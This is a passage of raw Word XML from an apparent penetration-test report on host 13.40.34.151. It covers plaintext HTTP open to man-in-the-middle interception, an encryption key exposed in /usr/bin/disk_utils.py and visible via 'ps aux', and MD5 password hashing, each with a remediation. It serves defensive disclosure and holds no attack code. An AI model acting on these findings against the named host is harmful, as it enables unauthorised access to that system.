            <w:r w:rsidRPr="57C4D39E" w:rsidR="23A36E29">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="038216E7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2A7C5AB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noSpellErr="1" w14:paraId="0CED0D9F" w14:textId="7768D05B">
            <w:pPr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https://attack.mitre.org/techniques/T1040/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="1F3E60C6" w14:textId="573CD661">
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="09E54BBD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Exploitation Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="26CCDB4A" w14:textId="573CD661">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP applications used in the system send data in plaintext. Attackers can use </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>MiTM</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Man in The Middle attack) or other types of attacks to intercept the traffic and learn user passwords or other sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="081BBA6D" w14:textId="573CD661">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Here it leaks sensitive information:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="0AA0512C" w14:textId="573CD661">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="32A6980E">
        <w:drawing>
          <wp:inline wp14:editId="1344241C" wp14:anchorId="0B267D43">
            <wp:extent cx="4572000" cy="1752600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="112985339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ae006458f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6209A241" w14:textId="573CD661">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E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7D3241E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9131D3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9D631C8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47D53D3A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66CAFDC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CC0E3EC" w14:textId="11B9D2F4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1A00057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18895FBF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2C4C7ADA" w14:textId="4337B166">
            <w:pPr>
              <w:pStyle w:val="Normal"/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57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> Configure and </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>force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usage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of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encrypted</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> HTTPS </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>when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communication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to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the</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> web server. Preferably use the </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>newest</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> TLS 1.3 </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> TLS 1.2 </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>with</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>strong</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>ciphersuites</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="6ED02BDA" w14:textId="59F367FE">
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="42D9AFCF" w14:textId="5C7791BB">
      <w:pPr>
        <w:pStyle w:val="Finding"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="1F80B816" w14:textId="47FCD662">
      <w:pPr>
        <w:pStyle w:val="Finding"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5DF42A1D">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Unsecured Credentials</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="60567233">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="754BDBA7">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">13.40.34.151 </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="60567233">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="572C8451">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="60567233">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="7B1EAB87" w14:textId="77777777">
      <w:pPr/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3682D2B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85B3BD4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274DA067" w:rsidP="57C4D39E" w:rsidRDefault="274DA067" w14:paraId="64C5D834" w14:textId="6E2FEDD8">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="274DA067">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">disk_utils.py </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="274DA067">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>containing sensitive</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="274DA067">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="274DA067">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="246CB619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49DFFF3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320961E9" w:rsidP="57C4D39E" w:rsidRDefault="320961E9" w14:paraId="391A6328" w14:textId="1947D31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color w:val="FFFF00"/>
                <w:highlight w:val="black"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="320961E9">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="black"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="0B9F6CF4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AA8BB87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403C98FB" w:rsidP="57C4D39E" w:rsidRDefault="403C98FB" w14:paraId="4FA4039D" w14:textId="6A73C413">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="403C98FB">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Ubuntu 22.04.1 LTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="51BE56E1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="4AA2D308" w:rsidP="57C4D39E" w:rsidRDefault="4AA2D308" w14:paraId="62903494" w14:textId="2BF3DFAF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4AA2D308">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Location:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="4AA2D308" w:rsidP="57C4D39E" w:rsidRDefault="4AA2D308" w14:paraId="60650DC4" w14:textId="3ECEB152">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="4AA2D308">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="4AA2D308">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="4AA2D308">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="4AA2D308">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>bin</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="4AA2D308">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>/disk_utils.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="34D01F68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6CCAB58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4CB1B949" w:rsidP="57C4D39E" w:rsidRDefault="4CB1B949" w14:noSpellErr="1" w14:paraId="798DAD4C" w14:textId="6E8B9D0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="4CB1B949">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>https://attack.mitre.org/techniques/T1552/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="1986EB8A" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="764A9699" w14:textId="33EA01A4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="60567233">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="60567233">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="60567233">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Proof</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="60567233">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="60567233">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="60567233">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Concept</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="2BFD02C5" w14:textId="3AB1B8D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="07875617">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the script </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="07875617">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>disk_utils.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="07875617">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="07875617">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> there is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="07875617">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>an i</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="56ED1D10">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>nformation</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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where</w:t>
      </w:r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the</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="56ED1D10">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> logs are </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="56ED1D10">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>stored</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="56ED1D10">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="56ED1D10">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="56ED1D10">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="56ED1D10">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r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the</w:t>
      </w:r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key</w:t>
      </w:r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for</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="56ED1D10">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="56ED1D10">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>encryption</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="56ED1D10">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="26AFBBAE" w14:textId="4C32C2EB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="06CDA220">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4707B417">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">isk_utils.py </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4707B417">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is visible from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4707B417">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4707B417">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-aux command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="5EA67B21" w14:textId="2E0915CF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="4F5B044B">
        <w:drawing>
          <wp:inline wp14:editId="3E0B6957" wp14:anchorId="63DEC0AD">
            <wp:extent cx="4572000" cy="847725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="849491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4d09250bb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327DF7A9" w14:textId="5AC200C6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="4F5B044B">
        <w:drawing>
          <wp:inline wp14:editId="3D973A22" wp14:anchorId="0963B9BF">
            <wp:extent cx="4572000" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="634314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5a44e5c38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45938D9B" w14:textId="7DC331C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="60567233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EC51B61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EC3EB4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77EBDCF3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3D47216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5A9321D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0AE77E5F" w14:textId="7C90798E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28311DB0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01F17ED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1B1CF82" w14:textId="5D7DB217">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0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06919874">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> Modify the </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="06919874">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>/usr/bin/disk_utils.py</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="06919874">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> permissions so it couldn’t be read by users.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="180D2041" w14:textId="47FD5B11">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="1C9C6E68" w14:textId="56FC18EA">
      <w:pPr>
        <w:pStyle w:val="Finding"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="70968C32">
        <w:rPr/>
        <w:t>CWE-328 Use of a Weak Hash</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1D919F7E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="72D153CD">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">13.40.34.151 </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1D919F7E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="3B2FC535">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1D919F7E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="1B55BC5F" w14:textId="33D13EE9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pP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7CF7F635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4BCA3C1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Description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6FD52046" w:rsidP="57C4D39E" w:rsidRDefault="6FD52046" w14:paraId="51069A6C" w14:textId="3FAA4E21">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="6FD52046">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Passwords are stored in the database in the hashed MD5 format</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="5712523D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3C86C51D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auto"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="528776BF" w:rsidP="57C4D39E" w:rsidRDefault="528776BF" w14:paraId="18BC282A" w14:textId="4FD8A26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Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="black"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="528776BF">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="black"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="1BFABEB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0BFCE715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System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40358724" w:rsidP="57C4D39E" w:rsidRDefault="40358724" w14:paraId="5B0D5D45" w14:textId="54982252">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="40358724">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
